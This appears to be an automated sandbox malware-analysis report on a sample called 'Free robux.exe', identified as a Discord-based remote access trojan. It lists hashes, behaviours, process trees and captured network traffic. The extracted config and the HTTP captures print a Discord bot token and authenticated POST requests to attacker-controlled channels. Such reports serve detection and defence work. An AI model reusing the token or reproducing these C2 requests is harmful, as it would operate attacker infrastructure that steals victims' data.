Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
132s -
max time network
133s -
platform
windows10-2004_x64 -
resource
win10v2004-20250129-en -
resource tags
arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system -
submitted
31/01/2025, 13:10 UTC
Behavioral task
behavioral1
Sample
Free robux.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
Free robux.exe
Resource
win10v2004-20250129-en
General
-
Target
Free robux.exe
-
Size
78KB
-
MD5
224ffc7642433a54523e38d9bd28a7b4
-
SHA1
45ce3d4b4161a916b6c3c1126fe19bf1a0ce9490
-
SHA256
e81c03f063eb81973ecbc690961658b9d613e1648c3612fbc1ffdd41fbf1f7b3
-
SHA512
1960f6a2bb79f258c0e78d056caf7a384eff84bd50439eff68a85cdedab416d2623607cc98351d457b5f2cb1e89096ca99a06b8210ec749dc44f050427ae1eb3
-
SSDEEP
1536:52WjO8XeEXFh5P7v88wbjNrfxCXhRoKV6+V+dPIC:5Zv5PDwbjNrmAE+NIC
Malware Config
Extracted
discordrat
-
discord_token
MTMzNDc5OTg4Mjg4Nzg4ODk1OQ.GYogWp.NMtpgtuN4Hf6PsEomIL-OoyUKqRkEVtf5alRts
-
server_id
1334800372321222707
Signatures
-
Discord RAT
A RAT written in C# using Discord as a C2.
-
Discordrat family
-
Downloads MZ/PE file 1 IoCs
flow pid Process 134 5064 Free robux.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 15 IoCs
flow ioc 20 discord.com 133 raw.githubusercontent.com 25 discord.com 73 discord.com 134 raw.githubusercontent.com 135 discord.com 137 discord.com 11 discord.com 24 discord.com 39 discord.com 72 discord.com 74 discord.com 75 discord.com 13 discord.com 35 discord.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133828027284736310" chrome.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 1736 chrome.exe 1736 chrome.exe 3648 msedge.exe 3648 msedge.exe 4176 msedge.exe 4176 msedge.exe 4480 identity_helper.exe 4480 identity_helper.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
pid Process 1736 chrome.exe 1736 chrome.exe 1736 chrome.exe 4176 msedge.exe 4176 msedge.exe 4176 msedge.exe 4176 msedge.exe -
Suspicious use of AdjustPrivilegeToken 51 IoCs
description pid Process Token: SeDebugPrivilege 5064 Free robux.exe Token: SeShutdownPrivilege 1736 chrome.exe Token: SeCreatePagefilePrivilege 1736 chrome.exe Token: SeShutdownPrivilege 1736 chrome.exe Token: SeCreatePagefilePrivilege 1736 chrome.exe Token: SeShutdownPrivilege 1736 chrome.exe Token: SeCreatePagefilePrivilege 1736 chrome.exe Token: SeShutdownPrivilege 1736 chrome.exe Token: SeCreatePagefilePrivilege 1736 chrome.exe Token: SeShutdownPrivilege 1736 chrome.exe Token: SeCreatePagefilePrivilege 1736 chrome.exe Token: SeShutdownPrivilege 1736 chrome.exe Token: SeCreatePagefilePrivilege 1736 chrome.exe Token: SeShutdownPrivilege 1736 chrome.exe Token: SeCreatePagefilePrivilege 1736 chrome.exe Token: SeShutdownPrivilege 1736 chrome.exe Token: SeCreatePagefilePrivilege 1736 chrome.exe Token: SeShutdownPrivilege 1736 chrome.exe Token: SeCreatePagefilePrivilege 1736 chrome.exe Token: SeShutdownPrivilege 1736 chrome.exe Token: SeCreatePagefilePrivilege 1736 chrome.exe Token: SeShutdownPrivilege 1736 chrome.exe Token: SeCreatePagefilePrivilege 1736 chrome.exe Token: SeShutdownPrivilege 1736 chrome.exe Token: SeCreatePagefilePrivilege 1736 chrome.exe Token: SeShutdownPrivilege 1736 chrome.exe Token: SeCreatePagefilePrivilege 1736 chrome.exe Token: SeShutdownPrivilege 1736 chrome.exe Token: SeCreatePagefilePrivilege 1736 chrome.exe Token: SeShutdownPrivilege 1736 chrome.exe Token: SeCreatePagefilePrivilege 1736 chrome.exe Token: SeShutdownPrivilege 1736 chrome.exe Token: SeCreatePagefilePrivilege 1736 chrome.exe Token: SeShutdownPrivilege 1736 chrome.exe Token: SeCreatePagefilePrivilege 1736 chrome.exe Token: SeShutdownPrivilege 1736 chrome.exe Token: SeCreatePagefilePrivilege 1736 chrome.exe Token: SeShutdownPrivilege 1736 chrome.exe Token: SeCreatePagefilePrivilege 1736 chrome.exe Token: SeShutdownPrivilege 1736 chrome.exe Token: SeCreatePagefilePrivilege 1736 chrome.exe Token: SeShutdownPrivilege 1736 chrome.exe Token: SeCreatePagefilePrivilege 1736 chrome.exe Token: SeShutdownPrivilege 1736 chrome.exe Token: SeCreatePagefilePrivilege 1736 chrome.exe Token: SeShutdownPrivilege 1736 chrome.exe Token: SeCreatePagefilePrivilege 1736 chrome.exe Token: SeShutdownPrivilege 1736 chrome.exe Token: SeCreatePagefilePrivilege 1736 chrome.exe Token: 33 3544 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 3544 AUDIODG.EXE -
Suspicious use of FindShellTrayWindow 53 IoCs
pid Process 1736 chrome.exe 1736 chrome.exe 1736 chrome.exe 1736 chrome.exe 1736 chrome.exe 1736 chrome.exe 1736 chrome.exe 1736 chrome.exe 1736 chrome.exe 1736 chrome.exe 1736 chrome.exe 1736 chrome.exe 1736 chrome.exe 1736 chrome.exe 1736 chrome.exe 1736 chrome.exe 1736 chrome.exe 1736 chrome.exe 1736 chrome.exe 1736 chrome.exe 1736 chrome.exe 1736 chrome.exe 1736 chrome.exe 1736 chrome.exe 1736 chrome.exe 1736 chrome.exe 1736 chrome.exe 4176 msedge.exe 4176 msedge.exe 4176 msedge.exe 4176 msedge.exe 4176 msedge.exe 4176 msedge.exe 4176 msedge.exe 4176 msedge.exe 4176 msedge.exe 4176 msedge.exe 4176 msedge.exe 4176 msedge.exe 4176 msedge.exe 4176 msedge.exe 4176 msedge.exe 4176 msedge.exe 4176 msedge.exe 4176 msedge.exe 4176 msedge.exe 4176 msedge.exe 4176 msedge.exe 4176 msedge.exe 4176 msedge.exe 4176 msedge.exe 4176 msedge.exe 4176 msedge.exe -
Suspicious use of SendNotifyMessage 48 IoCs
pid Process 1736 chrome.exe 1736 chrome.exe 1736 chrome.exe 1736 chrome.exe 1736 chrome.exe 1736 chrome.exe 1736 chrome.exe 1736 chrome.exe 1736 chrome.exe 1736 chrome.exe 1736 chrome.exe 1736 chrome.exe 1736 chrome.exe 1736 chrome.exe 1736 chrome.exe 1736 chrome.exe 1736 chrome.exe 1736 chrome.exe 1736 chrome.exe 1736 chrome.exe 1736 chrome.exe 1736 chrome.exe 1736 chrome.exe 1736 chrome.exe 4176 msedge.exe 4176 msedge.exe 4176 msedge.exe 4176 msedge.exe 4176 msedge.exe 4176 msedge.exe 4176 msedge.exe 4176 msedge.exe 4176 msedge.exe 4176 msedge.exe 4176 msedge.exe 4176 msedge.exe 4176 msedge.exe 4176 msedge.exe 4176 msedge.exe 4176 msedge.exe 4176 msedge.exe 4176 msedge.exe 4176 msedge.exe 4176 msedge.exe 4176 msedge.exe 4176 msedge.exe 4176 msedge.exe 4176 msedge.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 5064 Free robux.exe 5064 Free robux.exe 5064 Free robux.exe 5064 Free robux.exe 5064 Free robux.exe 5064 Free robux.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1736 wrote to memory of 4416 1736 chrome.exe 94 PID 1736 wrote to memory of 4416 1736 chrome.exe 94 PID 1736 wrote to memory of 4948 1736 chrome.exe 95 PID 1736 wrote to memory of 4948 1736 chrome.exe 95 PID 1736 wrote to memory of 4948 1736 chrome.exe 95 PID 1736 wrote to memory of 4948 1736 chrome.exe 95 PID 1736 wrote to memory of 4948 1736 chrome.exe 95 PID 1736 wrote to memory of 4948 1736 chrome.exe 95 PID 1736 wrote to memory of 4948 1736 chrome.exe 95 PID 1736 wrote to memory of 4948 1736 chrome.exe 95 PID 1736 wrote to memory of 4948 1736 chrome.exe 95 PID 1736 wrote to memory of 4948 1736 chrome.exe 95 PID 1736 wrote to memory of 4948 1736 chrome.exe 95 PID 1736 wrote to memory of 4948 1736 chrome.exe 95 PID 1736 wrote to memory of 4948 1736 chrome.exe 95 PID 1736 wrote to memory of 4948 1736 chrome.exe 95 PID 1736 wrote to memory of 4948 1736 chrome.exe 95 PID 1736 wrote to memory of 4948 1736 chrome.exe 95 PID 1736 wrote to memory of 4948 1736 chrome.exe 95 PID 1736 wrote to memory of 4948 1736 chrome.exe 95 PID 1736 wrote to memory of 4948 1736 chrome.exe 95 PID 1736 wrote to memory of 4948 1736 chrome.exe 95 PID 1736 wrote to memory of 4948 1736 chrome.exe 95 PID 1736 wrote to memory of 4948 1736 chrome.exe 95 PID 1736 wrote to memory of 4948 1736 chrome.exe 95 PID 1736 wrote to memory of 4948 1736 chrome.exe 95 PID 1736 wrote to memory of 4948 1736 chrome.exe 95 PID 1736 wrote to memory of 4948 1736 chrome.exe 95 PID 1736 wrote to memory of 4948 1736 chrome.exe 95 PID 1736 wrote to memory of 4948 1736 chrome.exe 95 PID 1736 wrote to memory of 4948 1736 chrome.exe 95 PID 1736 wrote to memory of 4948 1736 chrome.exe 95 PID 1736 wrote to memory of 2772 1736 chrome.exe 96 PID 1736 wrote to memory of 2772 1736 chrome.exe 96 PID 1736 wrote to memory of 2536 1736 chrome.exe 97 PID 1736 wrote to memory of 2536 1736 chrome.exe 97 PID 1736 wrote to memory of 2536 1736 chrome.exe 97 PID 1736 wrote to memory of 2536 1736 chrome.exe 97 PID 1736 wrote to memory of 2536 1736 chrome.exe 97 PID 1736 wrote to memory of 2536 1736 chrome.exe 97 PID 1736 wrote to memory of 2536 1736 chrome.exe 97 PID 1736 wrote to memory of 2536 1736 chrome.exe 97 PID 1736 wrote to memory of 2536 1736 chrome.exe 97 PID 1736 wrote to memory of 2536 1736 chrome.exe 97 PID 1736 wrote to memory of 2536 1736 chrome.exe 97 PID 1736 wrote to memory of 2536 1736 chrome.exe 97 PID 1736 wrote to memory of 2536 1736 chrome.exe 97 PID 1736 wrote to memory of 2536 1736 chrome.exe 97 PID 1736 wrote to memory of 2536 1736 chrome.exe 97 PID 1736 wrote to memory of 2536 1736 chrome.exe 97 PID 1736 wrote to memory of 2536 1736 chrome.exe 97 PID 1736 wrote to memory of 2536 1736 chrome.exe 97 PID 1736 wrote to memory of 2536 1736 chrome.exe 97 PID 1736 wrote to memory of 2536 1736 chrome.exe 97 PID 1736 wrote to memory of 2536 1736 chrome.exe 97 PID 1736 wrote to memory of 2536 1736 chrome.exe 97 PID 1736 wrote to memory of 2536 1736 chrome.exe 97 PID 1736 wrote to memory of 2536 1736 chrome.exe 97 PID 1736 wrote to memory of 2536 1736 chrome.exe 97 PID 1736 wrote to memory of 2536 1736 chrome.exe 97 PID 1736 wrote to memory of 2536 1736 chrome.exe 97 PID 1736 wrote to memory of 2536 1736 chrome.exe 97 PID 1736 wrote to memory of 2536 1736 chrome.exe 97 PID 1736 wrote to memory of 2536 1736 chrome.exe 97
Processes
-
C:\Users\Admin\AppData\Local\Temp\Free robux.exe"C:\Users\Admin\AppData\Local\Temp\Free robux.exe"1⤵
- Downloads MZ/PE file
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:5064 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://youtube.com/2⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4176 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff87e8546f8,0x7ff87e854708,0x7ff87e8547183⤵PID:4476
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,13391203378094197788,3698015521327156599,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:23⤵PID:1968
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,13391203378094197788,3698015521327156599,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
PID:3648
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,13391203378094197788,3698015521327156599,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2812 /prefetch:83⤵PID:4840
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,13391203378094197788,3698015521327156599,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:13⤵PID:4080
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,13391203378094197788,3698015521327156599,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:13⤵PID:3904
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,13391203378094197788,3698015521327156599,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4896 /prefetch:13⤵PID:4752
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,13391203378094197788,3698015521327156599,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3904 /prefetch:13⤵PID:3776
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2108,13391203378094197788,3698015521327156599,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4684 /prefetch:83⤵PID:2328
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2108,13391203378094197788,3698015521327156599,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5260 /prefetch:83⤵PID:4676
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,13391203378094197788,3698015521327156599,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5912 /prefetch:83⤵PID:4544
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,13391203378094197788,3698015521327156599,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5912 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:4480
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1736 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ff86c5dcc40,0x7ff86c5dcc4c,0x7ff86c5dcc582⤵PID:4416
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1884,i,2570419113643089019,4036222967911980988,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=1880 /prefetch:22⤵PID:4948
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2208,i,2570419113643089019,4036222967911980988,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=2220 /prefetch:32⤵PID:2772
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2280,i,2570419113643089019,4036222967911980988,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=2472 /prefetch:82⤵PID:2536
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3172,i,2570419113643089019,4036222967911980988,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=3200 /prefetch:12⤵PID:2860
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3280,i,2570419113643089019,4036222967911980988,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=3452 /prefetch:12⤵PID:1784
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4468,i,2570419113643089019,4036222967911980988,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=4564 /prefetch:12⤵PID:2080
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4824,i,2570419113643089019,4036222967911980988,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=4744 /prefetch:82⤵PID:3368
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5000,i,2570419113643089019,4036222967911980988,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=5064 /prefetch:82⤵PID:512
-
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:2248
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:3988
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3160
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3308
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x244 0x31c1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3544
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:400
Network
-
Remote address:8.8.8.8:53Requestgateway.discord.ggIN AResponsegateway.discord.ggIN A162.159.133.234gateway.discord.ggIN A162.159.136.234gateway.discord.ggIN A162.159.135.234gateway.discord.ggIN A162.159.134.234gateway.discord.ggIN A162.159.130.234
-
Remote address:162.159.133.234:443RequestGET /?v=9&encording=json HTTP/1.1
Connection: Upgrade,Keep-Alive
Upgrade: websocket
Sec-WebSocket-Key: ixQ57mOkdicgnloFzRbWIw==
Sec-WebSocket-Version: 13
Host: gateway.discord.gg
ResponseHTTP/1.1 101 Switching Protocols
Connection: upgrade
sec-websocket-accept: FAkldq3TVBjVDO4SZcuvWaXB90c=
upgrade: websocket
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BYsAsZIgJTGXbCT3%2FRx2pz3C54Y2YAzMc6ylJa17%2F5w0ZGe5UlRZX2MQIg2wRSuXq5LERPhOUuPrY3I7IT4RxAC%2FWM0AwPRxkojKlcOJl1KVhJN86oc%2FR0R6sEr2yBGCUDHesw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Content-Type-Options: nosniff
Server: cloudflare
CF-RAY: 90a9f17b581560fb-LHR
-
Remote address:8.8.8.8:53Requestdiscord.comIN AResponsediscord.comIN A162.159.128.233discord.comIN A162.159.138.232discord.comIN A162.159.135.232discord.comIN A162.159.137.232discord.comIN A162.159.136.232
-
Remote address:162.159.128.233:443RequestPOST /api/v9/guilds/1334800372321222707/channels HTTP/1.1
authorization: Bot MTMzNDc5OTg4Mjg4Nzg4ODk1OQ.GYogWp.NMtpgtuN4Hf6PsEomIL-OoyUKqRkEVtf5alRts
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 29
Expect: 100-continue
Connection: Keep-Alive
ResponseHTTP/1.1 201 Created
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __dcfduid=c646a98adfd411efaf721a9f2c430178; Expires=Wed, 30-Jan-2030 13:10:42 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: be56019ae011689ff5baf218062aacf5
x-ratelimit-limit: 2000
x-ratelimit-remaining: 1992
x-ratelimit-reset: 1738398261.909
x-ratelimit-reset-after: 69219.565
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UkOlgstl%2BIEhVA1XEanb6Uw5DpJyXU9s8tQY3%2FK6zK%2F9HSSAgxxcx4PEhfw8pm1vo0gSNzOoJgkK7dFTDxhXnAkVAno1mkDzvsBi2Xt0x%2Fc6t6XXmf99c83roogu"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Reporting-Endpoints: csp-sentry="https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870&sentry_environment=stable"
Content-Security-Policy: frame-ancestors 'none'; default-src https://o64374.ingest.sentry.io; report-to csp-sentry; report-uri https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870&sentry_environment=stable
Set-Cookie: __sdcfduid=c646a98adfd411efaf721a9f2c43017849e0e3297c71462983fd2a2b6c56dbd1200de69906646c14cacbf8b7c52e4781; Expires=Wed, 30-Jan-2030 13:10:42 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=e3f50a6efcbb359cf7f338055208fc03b953bd70-1738329042; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=30k6vcpalAVPjjgEYq6p.SvzZskDZJaDRYWjdZn0nMs-1738329042484-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 90a9f181df1f48c3-LHR
-
Remote address:8.8.8.8:53Request234.133.159.162.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request131.31.126.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request11.153.16.2.in-addr.arpaIN PTRResponse11.153.16.2.in-addr.arpaIN PTRa2-16-153-11deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Requestgeolocation-db.comIN AResponsegeolocation-db.comIN A159.89.102.253
-
Remote address:159.89.102.253:443RequestGET /json HTTP/1.1
Host: geolocation-db.com
Connection: Keep-Alive
ResponseHTTP/1.1 301 Moved Permanently
Date: Fri, 31 Jan 2025 13:10:42 GMT
Content-Type: text/html
Content-Length: 194
Location: https://geolocation-db.com/json/
Connection: keep-alive
-
Remote address:159.89.102.253:443RequestGET /json/ HTTP/1.1
Host: geolocation-db.com
ResponseHTTP/1.1 200 OK
Date: Fri, 31 Jan 2025 13:10:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *
-
Remote address:162.159.128.233:443RequestPOST /api/v9/channels/1334873496756424744/messages HTTP/1.1
authorization: Bot MTMzNDc5OTg4Mjg4Nzg4ODk1OQ.GYogWp.NMtpgtuN4Hf6PsEomIL-OoyUKqRkEVtf5alRts
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 116
Expect: 100-continue
ResponseHTTP/1.1 200 OK
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
